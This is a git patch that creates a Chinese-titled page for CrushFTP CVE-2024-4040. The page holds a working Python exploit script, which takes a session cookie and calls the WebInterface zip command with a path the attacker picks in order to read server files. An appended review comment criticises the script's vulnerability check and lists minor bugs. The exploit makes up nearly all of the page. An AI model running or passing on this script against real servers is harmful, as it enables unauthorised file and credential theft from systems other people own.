From 17f587dbbc429d8909989b8e09c9ca8ff9639c38 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 28 Apr 2024 20:41:45 +0800
Subject: [PATCH] =?UTF-8?q?Create=20CrushFTP=E6=9C=8D=E5=8A=A1=E5=99=A8?= =?UTF-8?q?=E7=AB=AF=E6=A8=A1=E6=9D=BF=E6=B3=A8=E5=85=A5(CVE-2024-4040).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 CrushFTP服务器端模板注入(CVE-2024-4040).md | 59 ++++++++++++++++++++++
 1 file changed, 59 insertions(+)
 create mode 100644 CrushFTP服务器端模板注入(CVE-2024-4040).md
diff --git a/CrushFTP服务器端模板注入(CVE-2024-4040).md b/CrushFTP服务器端模板注入(CVE-2024-4040).md
new file mode 100644
index 0000000..bb3e000
--- /dev/null
+++ b/CrushFTP服务器端模板注入(CVE-2024-4040).md
@@ -0,0 +1,59 @@
+## CrushFTP服务器端模板注入(CVE-2024-4040)
+
+## poc
+```python
+import requests
+import argparse
+
+HEADER = '\033[95m'
+OKBLUE = '\033[94m'
+OKCYAN = '\033[96m'
+OKGREEN = '\033[92m'
+WARNING = '\033[93m'
+FAIL = '\033[91m'
+ENDC = '\033[0m'
+BOLD = '\033[1m'
+UNDERLINE = '\033[4m'
+
+def get_cookies(url):
+ try:
+ session = requests.Session()
+ response = session.get(url)
+ if response.status_code != 200:
+ raise Exception("Failed to connect to the server")
+ session.cookies.get_dict()
+ return session.cookies.get_dict()
+ except Exception as e:
+ print(FAIL + "Error: " + str(e) + ENDC)
+ quit()
+
+def exploit(url, cookies, path):
+ try:
+ if not path.startswith("/") or not path.endswith("/"):
+ raise Exception("Invalid path format. Path should start and end with '/'")
+ url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=" + path + "&names=*"
+ response = requests.get(url, cookies=cookies)
+ if response.status_code != 200:
+ raise Exception("Failed to connect to the server")
+ return response.text
+ except Exception as e:
+ print(FAIL + "Error: " + str(e) + ENDC)
+ quit()
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u", "--url", help="URL of the target", required=True)
+ parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
+ args = parser.parse_args()
+ url = args.url
+ path = args.path
+ if not url.startswith("http"):
+ print(WARNING + "URL should start with 'http' or 'https'")
+ quit()
+ cookies = get_cookies(url)
+ if 'currentAuth' not in cookies:
+ print(WARNING + "Not vulnerable" + ENDC)
+ quit()
+ else:
+ print(OKCYAN + exploit(url, cookies, path) + ENDC)
+```
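Review bot: The `"Not vulnerable"` verdict in the `__main__` block rests only on the `currentAuth` cookie being absent from the first response, so it says nothing reliable about patch status. A fixed server would presumably still issue that cookie, and a host that is not CrushFTP at all gets the same message, so neither outcome should be used to triage one's own servers. The page also gives defenders nothing to act on: it has a title and a script but no affected or fixed versions and no advisory link, so a short section such as `## 影响版本 / 修复: <affected versions>, <fixed version>, <vendor advisory URL>` (placeholders, since none of these are on the page) belongs above the code fence. Within the script, the `-p` help text says `"Path to the file to read"` while `exploit()` rejects any value that does not start and end with `/`, and the bare `session.cookies.get_dict()` statement in `get_cookies()` discards its result. Neither `session.get(url)` nor `requests.get(url, cookies=cookies)` passes a `timeout=`, so the script can hang on an unresponsive host.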